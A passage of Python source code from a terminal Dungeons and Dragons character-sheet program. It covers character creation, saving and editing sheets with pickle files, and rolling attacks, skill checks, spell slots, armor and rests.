BACK' \\\n and ((asks_user == 'SOMETIMES' and result is None)\n or asks_user == 'NEVER'):\n if function_number != 0:\n function_number -= 1\n else:\n return False\n else:\n last_choice = result\n\n if result not 
in ['GO BACK', 'EXIT']:\n                function_number += 1\n                variables[variable_key] = result\n            elif result is None:\n                raise Exception(f'{variable_key} = None.')\n            elif result == 'GO BACK':\n                if function_number != 0:\n                    function_number -= 1\n                else:\n                    variables[variable_key] = 'GO BACK'\n                    return False\n            elif result == 'EXIT':\n                variables[variable_key] = 'EXIT'\n                return False\n\n    return True\n\n\ndef select_background_speciality(background):\n    background_speciality = None\n    if background.possible_specialities:\n        background_speciality = select(\n            options=background.possible_specialities,\n            prompt=f'As a {background.name}, you can choose something special.',\n            single_item=True\n        )\n\n    return background_speciality\n\n\ndef select_personality_trait(background):\n    personality_trait = select(\n        options=background.possible_traits + ['RANDOM', 'WRITE IN'],\n        prompt='Choose your personality trait.',\n        single_item=True\n    )\n    personality_trait = deal_other_options(\n        characteristic=personality_trait,\n        characteristic_list=background.possible_traits\n    )\n\n    return personality_trait\n\n\ndef select_ideal(background, alignment):\n    possible_ideals = []\n    for ideal in background.possible_ideals:\n        if ideal[1] in alignment:\n            possible_ideals.append(ideal[0])\n\n    ideal = select(\n        options=possible_ideals + ['RANDOM', 'WRITE IN'],\n        prompt='Choose your ideal.',\n        single_item=True\n    )\n    # the RANDOM option must draw from the alignment-filtered texts, not\n    # from the raw [text, alignment] pairs\n    ideal = deal_other_options(\n        characteristic=ideal,\n        characteristic_list=possible_ideals\n    )\n\n    return ideal\n\n\ndef select_bond(background):\n    bond = select(\n        options=background.possible_bonds + ['RANDOM', 'WRITE IN'],\n        prompt='Choose your bond.',\n        single_item=True\n    )\n    bond = deal_other_options(\n        characteristic=bond,\n        characteristic_list=background.possible_bonds,\n    )\n\n    return bond\n\n\ndef select_flaw(background):\n    flaw = select(\n        options=background.possible_flaws + ['RANDOM', 'WRITE IN'],\n        prompt='Choose your flaw.',\n        single_item=True\n    )\n    flaw = deal_other_options(\n        characteristic=flaw,\n        characteristic_list=background.possible_flaws\n    )\n\n    return flaw\n\n\ndef select_psychological(alignment, background):\n    variables = {\n        'BACKGROUND': background,\n        'ALIGNMENT': alignment,\n        'SPECIALITY': None,\n        'TRAIT': None,\n        'IDEAL': None,\n        'BOND': None,\n        'FLAW': None,\n    }\n\n    functions_order = [\n        ['SPECIALITY', select_background_speciality, ['BACKGROUND'],\n         'SOMETIMES'],\n        ['TRAIT', select_personality_trait, ['BACKGROUND'], 'ALWAYS'],\n        ['IDEAL', select_ideal, ['BACKGROUND', 'ALIGNMENT'], 'ALWAYS'],\n        ['BOND', select_bond, ['BACKGROUND'], 'ALWAYS'],\n        ['FLAW', select_flaw, ['BACKGROUND'], 'ALWAYS']\n    ]\n\n    if loop_through_functions(variables, functions_order):\n        background.background_speciality = variables['SPECIALITY']\n        background.personality_trait = variables['TRAIT']\n        background.ideal = variables['IDEAL']\n        background.bond = variables['BOND']\n        background.flaw = variables['FLAW']\n    else:\n        if 'GO BACK' in variables.values():\n            return 'GO BACK'\n        elif 'EXIT' in variables.values():\n            return 'EXIT'\n\n    clear_terminal()\n\n    return background\n\n\ndef select_race():\n    race = select(\n        options=index['RACES'],\n        prompt='In the world of Dungeons and Dragons, there are 14 races...',\n        show_type='key',\n        return_type='key',\n        single_item=True\n    )\n    clear_terminal()\n\n    # Each color of Dragonborn comes with different features, so each one is\n    # treated as a subrace with its own race object\n    if race == 'DRAGONBORN':\n        race = select(\n            options=index['DRAGONBORN'],\n            prompt='A Dragonborn can be of many 
colors. Choose your own:',\n            show_type='key',\n            return_type='value',\n            single_item=True\n        )\n        clear_terminal()\n    elif race in ['GO BACK', 'EXIT']:\n        pass\n    else:\n        race = index['RACES'][race]\n\n    return race\n\n\ndef select_class():\n    # Get Class name\n    classe = select(\n        options=index['CLASSES'],\n        prompt='In Dungeons and Dragons, there are 12 different classes:',\n        single_item=True\n    )\n    clear_terminal()\n\n    return classe\n\n\ndef select_background_feature(background):\n    feature = background.feature\n    if background.feature_options:\n        feature = select(\n            options=background.feature_options,\n            prompt=f'As a {background.name}, you can choose between the '\n                   f'features.',\n        )\n\n    return feature\n\n\ndef create_proficiencies(race, classe, background, skills_proficiency):\n    # Unite weapons with proficiency\n    weapon_proficiency = unite_proficiency(\n        race.weapon_proficiency,\n        classe.weapon_proficiency\n    )\n\n    # Unite armors with proficiency\n    armor_proficiency = unite_proficiency(\n        race.armor_proficiency,\n        classe.armor_proficiency\n    )\n\n    # Unite tools with proficiency\n    tools_proficiency = unite_proficiency(\n        race.tools_proficiency,\n        classe.tools_proficiency,\n        background.tools_proficiency\n    )\n\n    proficiencies = {\n        'VALUE': classe.proficiency,\n        'SAVING THROWS': classe.saving_throw_proficiency,\n        'SKILLS': skills_proficiency,\n        'ARMORS': armor_proficiency,\n        'WEAPONS': weapon_proficiency,\n        'TOOLS': tools_proficiency\n    }\n\n    return proficiencies\n\n\ndef create_new_character():\n    \"\"\"\n    Deals with all the info that a new character must have and\n    then creates this character with the info provided by the user.\n    :return: object of the class Character\n    \"\"\"\n\n    variables = {\n        'RACE': None,\n        'CLASS': None,\n        'BACKGROUND': None,\n        'LEVEL': None,\n        'ABILITIES': None,\n        'ALIGNMENT': None,\n        'SKILLS PROFICIENCY': None,\n        'LANGUAGES': None,\n        'EQUIPMENTS': None,\n        'PERSONAL INFO': None,\n        'PROFICIENCIES': None,\n        'FEATURE': None,\n        'TOOLS': None\n    }\n\n    functions_order = [\n        ['RACE', select_race, [], 'ALWAYS'],\n        ['CLASS', select_class, [], 'ALWAYS'],\n        ['BACKGROUND', select_background, [], 'ALWAYS'],\n        ['LEVEL', select_level, [], 'ALWAYS'],\n        ['ABILITIES', create_abilities,\n         ['CLASS', 'RACE', 'ABILITIES'], 'ALWAYS'],\n        ['CLASS', create_class, ['CLASS', 'LEVEL', 'ABILITIES'], 'NEVER'],\n        ['ALIGNMENT', get_alignment, [], 'ALWAYS'],\n        ['FEATURE', select_background_feature, ['BACKGROUND'], 'SOMETIMES'],\n        ['SKILLS PROFICIENCY', select_skills,\n         ['RACE', 'CLASS', 'BACKGROUND'], 'ALWAYS'],\n        ['LANGUAGES', select_new_languages, ['BACKGROUND', 'RACE'], 'ALWAYS'],\n        ['TOOLS', select_proficient_tool,\n         ['RACE', 'CLASS', 'BACKGROUND'], 'SOMETIMES'],\n        ['EQUIPMENTS', select_equipment, ['CLASS', 'BACKGROUND'], 'ALWAYS'],\n        ['BACKGROUND', select_psychological,\n         ['ALIGNMENT', 'BACKGROUND'], 'ALWAYS'],\n        ['PERSONAL INFO', get_personal_info, ['RACE'], 'ALWAYS'],\n        ['PROFICIENCIES', create_proficiencies,\n         ['RACE', 'CLASS', 'BACKGROUND', 'SKILLS PROFICIENCY'], 'NEVER']\n    ]\n\n    if loop_through_functions(variables, functions_order):\n        variables['BACKGROUND'].feature = variables['FEATURE']\n        try:\n            variables['RACE'].tools_proficiency = variables['TOOLS']['RACE']\n            variables['CLASS'].tools_proficiency = variables['TOOLS']['CLASS']\n            variables['BACKGROUND'].tools_proficiency = \\\n                variables['TOOLS']['BACKGROUND']\n        except (KeyError, TypeError):\n            pass\n\n        for category in variables['EQUIPMENTS'].keys():\n            variables['EQUIPMENTS'][category] += \\\n                variables['CLASS'].equipment[category]\n\n        character = 
Character(\n race=variables['RACE'],\n background=variables['BACKGROUND'],\n classe=variables['CLASS'],\n abilities=variables['ABILITIES'],\n alignment=variables['ALIGNMENT'],\n personal_info=variables['PERSONAL INFO'],\n proficiencies=variables['PROFICIENCIES'],\n languages=variables['LANGUAGES'],\n equipments=variables['EQUIPMENTS'],\n )\n\n # Checks if character is Drow and, if so, adds the proper spells\n race_magic(\n race_name=character.general_info['RACE'],\n level=1,\n magical_ability=character.magical_ability\n )\n\n for lvl in range(\n character.general_info['LEVEL'],\n variables['CLASS'].level\n ):\n character.general_info['XP'] = character.xp_by_level[lvl]\n level_up(character)\n\n return character\n else:\n return None\n\n\ndef check_files():\n \"\"\"\n Check if the necessary folder with the saved sheets and config is in order\n :return: the path of the folder of the sheets\n \"\"\"\n global config\n parent = get_parent()\n\n # Check sheets\n sheets_folder = parent.joinpath('Files/Sheets')\n index_file = sheets_folder.joinpath('index.txt')\n\n if not sheets_folder.exists():\n sheets_folder.mkdir(parents=True)\n\n if not index_file.exists():\n sheets_files = get_children(sheets_folder)\n index_file.touch()\n\n for sheet in sheets_files:\n with open(sheet, 'rb') as file:\n character = pickle.load(file)\n\n with open(index_file, 'a') as file:\n file.write(sheet + '\\n')\n file.write(character.personal_info[\"CHARACTER'S NAME\"] + '\\n')\n file.write(character.general_info['RACE'] + '\\n')\n file.write(character.general_info['CLASS'] + '\\n')\n file.write(str(character.general_info['LEVEL']) + '\\n')\n file.write(character.general_info['BACKGROUND'] + '\\n')\n\n # Check configurations\n config_folder = parent.joinpath('Files')\n config_file = config_folder.joinpath('config.txt')\n\n if not config_file.exists():\n config_file.touch()\n\n with open(config_file, 'wb') as new_file:\n pickle.dump(config, new_file)\n\n return parent\n\n\ndef save_sheet(character):\n folder = check_files().joinpath('Files/Sheets')\n path = folder.joinpath(character.personal_info[\"CHARACTER'S NAME\"] + '.txt')\n exists = path.exists()\n\n with open(path, 'wb') as new_file:\n pickle.dump(character, new_file)\n\n if not exists:\n string_path = path.as_posix()\n index_path = folder.joinpath('index.txt')\n with open(index_path, 'a') as index_file:\n index_file.write(string_path + '\\n')\n index_file.write(character.personal_info[\"CHARACTER'S NAME\"] + '\\n')\n index_file.write(character.general_info['RACE'] + '\\n')\n index_file.write(character.general_info['CLASS'] + '\\n')\n index_file.write(str(character.general_info['LEVEL']) + '\\n')\n index_file.write(character.general_info['BACKGROUND'] + '\\n')\n\n\ndef show_sheets():\n \"\"\"\n Prints a formatted table with the main info of the character for the user\n to choose.\n :return: dictionary with the number associated with all the sheets\n \"\"\"\n folder = check_files().joinpath('Files/Sheets')\n sheets_index = folder.joinpath('index.txt')\n sheets_path = {}\n number_sheets = len(get_children(folder)) - 1\n headline = (\n '(##) '\n 'Name '\n 'Race '\n 'Class '\n 'Lv '\n 'Background \\n'\n )\n\n files_info = {}\n with open(sheets_index, 'r') as file_object:\n for _ in range(number_sheets):\n file = file_object.readline()[:-1]\n\n name = file_object.readline()[:-1]\n name = name.strip().split(' ')\n if len(name) > 1: # If the character has more than one name\n name = name[0] + ' ' + name[-1] # Only first and last names\n else:\n name = name[0] # The only 
name he/she has.\n\n name = f'{name:.24s}' # Max length of 24 characters\n key = name.upper() # To use in the dictionary\n name = f'{name:24s}' # Must occupy 24 characters\n info = ' ' + name + ' '\n\n race = file_object.readline()[:-1]\n race = set_string_size(race, 18)\n info += race + ' '\n\n classe = file_object.readline()[:-1]\n classe = set_string_size(classe, 9)\n info += classe + ' '\n\n level = file_object.readline()[:-1]\n level = set_string_size(level, 2)\n info += level + ' '\n\n background = file_object.readline()[:-1]\n background = set_string_size(background, 13)\n info += background\n\n files_info[info] = key\n sheets_path[key] = file\n files_info[' GO BACK'] = 'GO BACK'\n sheets_path['GO BACK'] = 'GO BACK'\n\n answer = select(\n options=files_info,\n prompt=headline,\n show_type='key',\n return_type='value',\n single_item=True,\n go_back=False,\n finish=False\n )\n\n clear_terminal()\n\n return sheets_path[answer]\n\n\ndef delete_sheet(sheet):\n folder = check_files().joinpath('Files/Sheets')\n index_path = folder.joinpath('index.txt')\n string_path = sheet.as_posix()\n\n with open(index_path, 'r') as index_file:\n lines = index_file.readlines()\n number_sheets = int(len(lines) / 6)\n\n saved_sheets = {}\n with open(index_path, 'r') as index_file:\n for _ in range(number_sheets):\n path_read = index_file.readline()\n saved_sheets[path_read[:-1]] = {\n 'PATH': path_read,\n 'NAME': index_file.readline(),\n 'RACE': index_file.readline(),\n 'CLASS': index_file.readline(),\n 'LEVEL': index_file.readline(),\n 'BACKGROUND': index_file.readline()\n }\n\n saved_sheets.pop(string_path)\n\n with open(index_path, 'w') as index_file:\n for sheet_to_save in saved_sheets.values():\n index_file.write(sheet_to_save['PATH'])\n index_file.write(sheet_to_save['NAME'])\n index_file.write(sheet_to_save['RACE'])\n index_file.write(sheet_to_save['CLASS'])\n index_file.write(sheet_to_save['LEVEL'])\n index_file.write(sheet_to_save['BACKGROUND'])\n\n sheet.unlink()\n\n\ndef edit_character(character):\n possible_to_edit = [\n 'SPELLS',\n 'PERSONAL INFO',\n 'ALIGNMENT',\n ]\n if character.sessions == 0:\n possible_to_edit += [\n 'SKILLS',\n 'RELOCATE ABILITIES',\n 'EQUIPMENT',\n ]\n\n to_edit = None\n while to_edit != 'GO BACK':\n to_edit = select(\n options=possible_to_edit,\n prompt='Select what you want to edit',\n single_item=True,\n finish=False,\n )\n\n clear_terminal()\n\n if to_edit == 'EQUIPMENT':\n end = False\n\n while not end:\n equipment_bought = choose_or_bought()\n\n if equipment_bought not in ['EXIT', 'GO BACK']:\n if equipment_bought:\n new_equipments, new_wealth = buy_equipment(\n character.backup['CLASS'].starting_wealth\n )\n\n if new_equipments != 'GO BACK':\n end = True\n\n if new_equipments is not None:\n character.equipments = new_equipments\n character.wealth = new_wealth\n else:\n new_equipments = choose_equipment(\n character.backup['CLASS'].equipment_options\n )\n\n if new_equipments not in ['GO BACK', 'EXIT']:\n end = True\n character.wealth = character.backup['BACKGROUND'] \\\n .wealth\n character.equipments = new_equipments\n\n elif new_equipments == 'EXIT':\n end = True\n\n character.equipments = group_equipment(character.equipments)\n\n elif equipment_bought == 'EXIT':\n to_edit = 'GO BACK'\n\n elif equipment_bought == 'GO BACK':\n end = True\n\n elif to_edit == 'RELOCATE ABILITIES':\n values = get_existing_abilities_values(\n character.abilities, character.backup['RACE'].ability_increase)\n\n character.abilities.values = get_abilities_values(\n values,\n 
character.general_info['CLASS']\n            )\n\n            for ability, increase in \\\n                    character.backup['RACE'].ability_increase.items():\n                character.abilities.increment_ability(ability, increase)\n\n        elif to_edit == 'SKILLS':\n            new_skills = select_skills(\n                race=character.backup['RACE'],\n                classe=character.backup['CLASS'],\n                background=character.backup['BACKGROUND']\n            )\n\n            if new_skills != 'GO BACK':\n                if new_skills != 'EXIT':\n                    character.proficiencies['SKILLS'] = new_skills\n                else:\n                    to_edit = 'GO BACK'\n\n        elif to_edit == 'SPELLS':\n            if character.magical_ability.has_magic:\n                end = False\n                while not end:\n                    cont = True\n\n                    copy_character = copy.deepcopy(character)\n                    copy_character.magical_ability.set_cantrips([])\n                    new_cantrips = select_cantrips(copy_character)\n\n                    if new_cantrips not in ['EXIT', 'GO BACK']:\n                        character.magical_ability.set_cantrips([])\n                        character.magical_ability.set_cantrips(new_cantrips)\n                    else:\n                        cont = False\n                        end = True\n\n                        if new_cantrips == 'EXIT':\n                            to_edit = 'GO BACK'\n\n                    if cont:\n                        copy_character.magical_ability.set_spells({})\n                        new_spells = select_spells(copy_character)\n\n                        if new_spells not in ['EXIT', 'GO BACK']:\n                            end = True\n                            character.magical_ability.set_spells({})\n                            character.magical_ability.set_spells(new_spells)\n                        elif new_spells == 'EXIT':\n                            end = True\n                            to_edit = 'GO BACK'\n            else:\n                clear_terminal()\n\n                print('You are no coward! No need for magic!')\n                print('Press ENTER to continue.')\n                input()\n\n        elif to_edit == 'ALIGNMENT':\n            option = select(\n                options=index['ALIGNMENTS'],\n                prompt='In Dungeons and Dragons, '\n                       'there are 9 possible alignments.',\n                single_item=True,\n            )\n\n            if option != 'GO BACK':\n                if option != 'EXIT':\n                    character.general_info['ALIGNMENT'] = option\n                else:\n                    to_edit = 'GO BACK'\n\n        elif to_edit == 'PERSONAL INFO':\n            options = [\n                'PLAYER NAME', 'CHARACTER NAME', 'AGE', 'HEIGHT', 'WEIGHT',\n                'EYES COLOR', 'SKIN COLOR', 'HAIR COLOR', 'HISTORY'\n            ]\n\n            end = False\n            while not end:\n                answer = select(\n                    options=options,\n                    prompt='Select what to edit in your personal info.',\n                    single_item=True,\n                )\n\n                if answer == 'PLAYER NAME':\n                    character.general_info[\"PLAYER'S NAME\"] = get_player_name()\n                elif answer == 'CHARACTER NAME':\n                    parent_folder = get_parent()\n                    sheets_folder = parent_folder.joinpath('Files/Sheets')\n                    sheet_file = sheets_folder.joinpath(\n                        character.general_info[\"NAME\"] + '.txt'\n                    )\n                    delete_sheet(sheet_file)\n                    new_name = get_name()\n                    character.general_info[\"NAME\"] = new_name\n                    character.personal_info[\"CHARACTER'S NAME\"] = new_name\n                    save_sheet(character)\n                elif answer == 'AGE':\n                    character.personal_info['AGE'] = get_age(\n                        character.backup['RACE'])\n                elif answer == 'HEIGHT':\n                    character.personal_info['HEIGHT'] = get_height(\n                        character.backup['RACE'])\n                elif answer == 'WEIGHT':\n                    character.personal_info['WEIGHT'] = get_weight()\n                elif answer == 'EYES COLOR':\n                    character.personal_info['EYE'] = get_eye_color()\n                elif answer == 'SKIN COLOR':\n                    character.personal_info['SKIN'] = get_skin_color()\n                elif answer == 'HAIR COLOR':\n                    character.personal_info['HAIR'] = get_hair_color()\n                elif answer == 'HISTORY':\n                    character.personal_info['HISTORY'] = get_history()\n                else:\n                    end = True\n\n                if answer == 'EXIT':\n                    to_edit = 'GO BACK'\n\n        clear_terminal()\n\n    return True\n\n\ndef get_extra_modifier():\n    answer = select(\n        options=['YES', 'NO'],\n        prompt='Besides the ability modifier and '\n               'proficiency, is there any other modifier that '\n               'you must add to this roll?',\n        single_item=True,\n        go_back=False,\n    )\n\n    if answer == 'YES':\n        
modifier = get_a_number(\n            prompt='Type the modifier.',\n            go_back_message=False\n        )\n    elif answer == 'NO':\n        modifier = 0\n    else:\n        return answer\n\n    return modifier\n\n\ndef get_dis_advantage():\n    answer = select(\n        options=['ADVANTAGE', 'DISADVANTAGE', 'NO'],\n        prompt='Do you have advantage or disadvantage on this roll?',\n        single_item=True,\n        go_back=False,\n    )\n\n    if answer in ['ADVANTAGE', 'DISADVANTAGE']:\n        if answer == 'ADVANTAGE':\n            choose_number = '>'\n        else:  # answer == 'DISADVANTAGE'\n            choose_number = '<'\n    elif answer == 'NO':\n        choose_number = None\n    else:\n        return answer\n\n    return choose_number\n\n\ndef get_info_about_roll(config_key, extra_modifier, dis_advantage):\n    choose_number = None\n    modifier = 0\n\n    if config[config_key] == 'ASK':\n\n        if extra_modifier is True:\n            modifier = get_extra_modifier()\n            if modifier == 'EXIT':\n                return modifier\n\n        if dis_advantage is True:\n            choose_number = get_dis_advantage()\n            if choose_number == 'EXIT':\n                return choose_number\n\n    return choose_number, modifier\n\n\ndef weapon_attack(character):\n    clear_terminal()\n\n    str_modifier = character.abilities.score('STR')\n    dex_modifier = character.abilities.score('DEX')\n\n    options = {}\n    for weapon in character.equipments['WEAPONS']:\n        options[f'{weapon.name.title()}'] = weapon\n\n    while True:\n        weapon = select(\n            options=options,\n            prompt='Select a weapon:',\n            show_type='key',\n            return_type='value',\n            single_item=True\n        )\n\n        if weapon != 'GO BACK' and weapon != 'EXIT':\n            original_damage_dice = Dice(\n                number=weapon.damage.number,\n                maximum=weapon.damage.max,\n            )\n\n            ability_modifier = None\n\n            if weapon.name in character.proficiencies['WEAPONS']:\n                proficiency = character.proficiencies['VALUE']\n            else:\n                proficiency = 0\n\n            if 'FINESSE' in weapon.properties:\n                if dex_modifier > str_modifier:\n                    ability_modifier = dex_modifier\n                else:\n                    ability_modifier = str_modifier\n\n            elif 'THROWN' in weapon.properties:\n                if config['ATTACK ALWAYS'] == 'ASK':\n                    answer = select(\n                        options=['THROW', 'DON\\'T THROW'],\n                        prompt='This weapon can be thrown. 
Would you like to throw it?',\n                        single_item=True,\n                        go_back=False\n                    )\n\n                    if answer == 'THROW':\n                        ability_modifier = dex_modifier\n                    elif answer == 'DON\\'T THROW':\n                        ability_modifier = str_modifier\n                    elif answer == 'EXIT':\n                        return answer\n\n                else:  # config['ATTACK ALWAYS'] == 'NO'\n                    ability_modifier = str_modifier\n\n            else:\n                for classifications in index['EQUIPMENT']['WEAPON'].values():\n                    for classification, items in classifications.items():\n                        for weapon_in_index in items.values():\n                            if weapon_in_index.name == weapon.name:\n                                if classification == 'MELEE':\n                                    ability_modifier = str_modifier\n                                else:  # classification == 'RANGED'\n                                    ability_modifier = dex_modifier\n\n            if ability_modifier is None:\n                raise Exception('Value of ability_modifier is None!')\n\n            choose_number, modifier = get_info_about_roll(\n                config_key='ATTACK ALWAYS',\n                extra_modifier=True,\n                dis_advantage=True\n            )\n\n            d20 = Dice()\n            d20_string = convert_dice_to_d_format(d20)\n            damage_dice = convert_dice_to_d_format(weapon.damage)\n            damage_dice = damage_dice[1:]\n\n            print(f'You selected {weapon.name.title()}')\n            print(f'Your attack is {d20_string}; the damage is a {damage_dice}')\n            print('Press ENTER to roll your attack...')\n            input()\n\n            damage_modifier = ability_modifier\n            attack_modifier = ability_modifier + proficiency + modifier\n\n            if choose_number:\n                if choose_number == '>':\n                    result = d20.roll(advantage=True)\n                else:  # choose_number == '<'\n                    result = d20.roll(disadvantage=True)\n            else:\n                result = d20.roll()\n\n            if result == 20:\n                print('Which is a CRITICAL SUCCESS!')\n                # A critical hit doubles the number of damage dice\n                weapon.damage.number *= 2\n\n            elif result == 1:\n                print('Which is a failure regardless of any modifier!')\n                weapon.damage.number = 0\n\n            if result != 1:\n                result += attack_modifier\n                print(f'You have a modifier total of {attack_modifier}, making '\n                      f'your total attack {result}!')\n            print('')\n\n            damage = weapon.damage.roll()\n            if damage > 0:\n                damage += damage_modifier\n                print(\n                    f\"If you succeed in your attack, \"\n                    f\"you deal {damage} damage!\"\n                )\n\n            print('Press ENTER to continue')\n            input()\n\n            weapon.damage = original_damage_dice\n\n        elif weapon == 'GO BACK' or weapon == 'EXIT':\n            return weapon\n\n\ndef skill_check(character):\n    while True:\n        skill = select(\n            options=index['SKILLS'],\n            prompt='Select which skill you want to check.',\n            show_type='key',\n            return_type='key',\n            single_item=True\n        )\n\n        if skill in ['EXIT', 'GO BACK']:\n            return skill\n        else:\n            choose_number, modifier = get_info_about_roll(\n                config_key='SKILL CHECK ALWAYS',\n                extra_modifier=False,\n                dis_advantage=True,\n            )\n\n            ability = index['SKILLS'][skill]\n            ability_modifier = character.abilities.score(ability)\n\n            proficiency = 0\n            if skill in character.proficiencies['SKILLS']:\n                proficiency = character.proficiencies['VALUE']\n\n            clear_terminal()\n            print(f'You have selected {skill}.')\n            print(f'{skill} is associated with {ability}.')\n            if proficiency:\n                print('You are proficient in this skill!')\n            print('')\n\n            print(f'Your ability modifier is {ability_modifier}.')\n            if proficiency:\n                print(f'Your proficiency is {proficiency}.')\n            print('')\n\n            print('Press ENTER to roll your die...')\n            input()\n\n            d20 = Dice()\n\n            if choose_number == '>':\n                value = d20.roll(advantage=True)\n            elif choose_number == '<':\n                value = d20.roll(disadvantage=True)\n            else:  # No advantage, nor disadvantage\n                value = d20.roll()\n\n            total_modifier = ability_modifier + proficiency + modifier\n            total_value = total_modifier + value\n\n            print(f'You rolled {value}.')\n            print(\n                f'With a total modifier of 
{total_modifier}, '\n                f'you rolled {total_value}.'\n            )\n            print('')\n\n            print('Press ENTER to go back...')\n            input()\n\n\ndef use_magic(character):\n    clear_terminal()\n    check_spells(character)\n\n    if character.magical_ability.has_magic is not None:\n        loop = True\n        while loop:\n            if character.magical_ability.slots_spent \\\n                    != character.magical_ability.spell_slots:\n                prompt = 'You still have slots to spend.\\n\\n'\n\n                options = []\n                for lvl, slots in character.magical_ability.spell_slots.items():\n                    slots_spent = character.magical_ability.slots_spent[lvl]\n                    available_slots = slots - slots_spent\n\n                    if available_slots > 0:\n                        options.append(str(lvl))\n                        prompt += f'You have {available_slots} ' \\\n                                  f'slots of level {lvl} to spend.\\n'\n                prompt += '\\nSelect the spell slot you want to spend.'\n\n                show_spells(\n                    character=character,\n                    enter_continue=False,\n                    show_empty=False,\n                )\n\n                print_name('-')\n                print('')\n\n                answer = select(\n                    options=options,\n                    prompt=prompt,\n                    single_item=True,\n                    clean=False\n                )\n\n                if answer == 'GO BACK':\n                    return answer\n                elif answer == 'EXIT':\n                    return answer\n                else:\n                    answer = int(answer)\n                    character.magical_ability.slots_spent[answer] += 1\n            else:\n                print('It appears you already spent all available slots!')\n                print('Try to take a rest to make them available again.')\n                print('Press ENTER to GO BACK...')\n                input()\n\n                return None\n\n            clear_terminal()\n    else:\n        print('Your character has no access to magic.')\n        input()\n\n    clear_terminal()\n\n    return None\n\n\ndef equip_armor(character):\n    loop = True\n    while loop:\n        armors = {}\n        for armor in character.equipments['ARMORS']:\n            if armor == character.equipments['ARMOR EQUIPPED']:\n                pass\n            elif character.equipments[\n                    'SHIELD EQUIPPED'] and armor.name == 'SHIELD':\n                pass\n            else:\n                armors[armor.name] = armor\n\n        if character.equipments['ARMOR EQUIPPED']:\n            armors['REMOVE ARMOR'] = 'REMOVE ARMOR'\n\n            armor_equipped = character.equipments['ARMOR EQUIPPED']\n            text = f'You are wearing a {armor_equipped.name.title()} ' \\\n                   f'armor - {armor_equipped.armor_type.title()}.\\n'\n            text += f'Its Armor Class is {armor_equipped.armor_class}.\\n'\n\n            if armor_equipped.strength:\n                text += f'To wear it, you must have a Strength score of ' \\\n                        f'{armor_equipped.strength}.\\n'\n\n            if armor_equipped.dex_max:\n                text += 'Your maximum dexterity modifier given by this armor ' \\\n                        f'is {armor_equipped.dex_max}.\\n'\n\n            if armor_equipped.stealth_disadvantage:\n                text += 'It also gives you disadvantage on stealth checks!\\n'\n        else:\n            text = 'You are currently not wearing any armor.\\n'\n\n        if character.equipments['SHIELD EQUIPPED']:\n            armors['REMOVE SHIELD'] = 'REMOVE SHIELD'\n\n            text += '\\nYou are also wearing a shield!\\n'\n            text += 'The shield adds 2 to your general Armor Class.\\n'\n\n        text += '\\nSelect an armor to equip on your character.\\n'\n        text += 'Be aware that doing so will replace your ' \\\n                'current armor, if there is one.\\n'\n\n        answer = select(\n            options=armors,\n            prompt=text,\n            show_type='key',\n            return_type='value',\n            single_item=True\n        )\n\n        if answer not in ['GO BACK', 'EXIT']:\n            if answer == 'REMOVE ARMOR':\n                character.equipments['ARMOR EQUIPPED'] = []\n\n            elif answer == 'REMOVE SHIELD':\n                character.equipments['SHIELD EQUIPPED'] = False\n\n            elif answer.name == 'SHIELD':\n                character.equipments['SHIELD EQUIPPED'] = True\n\n            else:\n                character.equipments['ARMOR EQUIPPED'] = answer\n\n            clear_terminal()\n            character.general_stats['AC'] = 10 \\\n                + character.abilities.score('DEX')\n\n            if 
character.equipments['SHIELD EQUIPPED'] is True:\n                character.general_stats['AC'] += shield.armor_class\n\n            if character.equipments['ARMOR EQUIPPED']:\n                equipped_armor = character.equipments['ARMOR EQUIPPED']\n                character.general_stats['AC'] += equipped_armor.armor_class\n\n            clear_terminal()\n\n            save_sheet(character)\n\n        elif answer == 'GO BACK':\n            loop = False\n        elif answer == 'EXIT':\n            return 'EXIT'\n\n    return None\n\n\ndef rest(character):\n    answer = select(\n        options=['LONG REST', 'SHORT REST'],\n        prompt='What kind of rest would you like to take?',\n        single_item=True\n    )\n\n    if answer == 'LONG REST':\n        if character.magical_ability.has_magic:\n            for level in character.magical_ability.slots_spent.keys():\n                character.magical_ability.slots_spent[level] = 0\n\n            if character.magical_ability.prepare_spells:\n                choice = select(\n                    options=['YES', 'NO'],\n                    prompt='Would you like to change your prepared spells?',\n                    single_item=True,\n                    go_back=False,\n                    finish=False\n                )\n\n                if choice == 'YES':\n                    prepare_spells(character, finish=False)\n\n        character.general_stats['CURRENT HP'] = \\\n            character.general_stats['MAXIMUM HP'] \\\n            + character.general_stats['TEMPORARY HP']\n        character.general_stats['USED HIT DICE'] = 0\n\n    elif answer == 'SHORT REST':\n        if character.general_stats['CURRENT HP'] \\\n                < character.general_stats['MAXIMUM HP'] \\\n                + character.general_stats['TEMPORARY HP']:\n            if character.general_stats['USED HIT DICE'] \\\n                    < character.general_info['LEVEL']:\n                # MULTICLASS\n                number = character.general_stats['HIT DICE'].max\n                options = {}\n                for level in range(\n                        character.general_info['LEVEL']\n                        - character.general_stats['USED HIT DICE']\n                ):\n                    dice = Dice(level + 1, number)\n                    options[convert_dice_to_d_format(dice)] = dice\n\n                answer = select(\n                    options=options,\n                    prompt='You can use a certain number of hit dice to '\n                           'recover your Hit Points.',\n                    show_type='key',\n                    return_type='value',\n                    single_item=True\n                )\n\n                if answer == 'GO BACK' or answer == 'EXIT':\n                    return answer\n                else:\n                    clear_terminal()\n                    if config['DICE ROLL'] == 'VIRTUAL':\n                        recovered_hp = answer.roll(\n                            modifier=character.abilities.score('CON')\n                        )\n                        print(f'You rolled {recovered_hp}!')\n                        print('Press ENTER to continue...')\n                        input()\n                    else:  # config['DICE ROLL'] == 'PHYSICAL'\n                        recovered_hp = get_typed_dice(\n                            dice=answer,\n                            objective='define your recovered HP.'\n                        )\n                        recovered_hp += character.abilities.score('CON')\n\n                    if character.general_stats['CURRENT HP'] \\\n                            + recovered_hp \\\n                            > character.general_stats['MAXIMUM HP'] \\\n                            + character.general_stats['TEMPORARY HP']:\n                        character.general_stats['CURRENT HP'] = \\\n                            character.general_stats['MAXIMUM HP'] \\\n                            + character.general_stats['TEMPORARY HP']\n                    else:\n                        character.general_stats['CURRENT HP'] += recovered_hp\n\n                    print('You now have '\n                          f'{character.general_stats[\"CURRENT HP\"]} HP.')\n                    print('Press ENTER to continue...')\n                    input()\n\n                    character.general_stats['USED HIT DICE'] += answer.number\n\n    elif answer == 'EXIT':\n        return answer\n\n    save_sheet(character)\n    return None\n\n\ndef death_check(character):\n    d20 = Dice()\n\n    end = False\n    while not end:\n        clear_terminal()\n\n        print('Oh, no! 
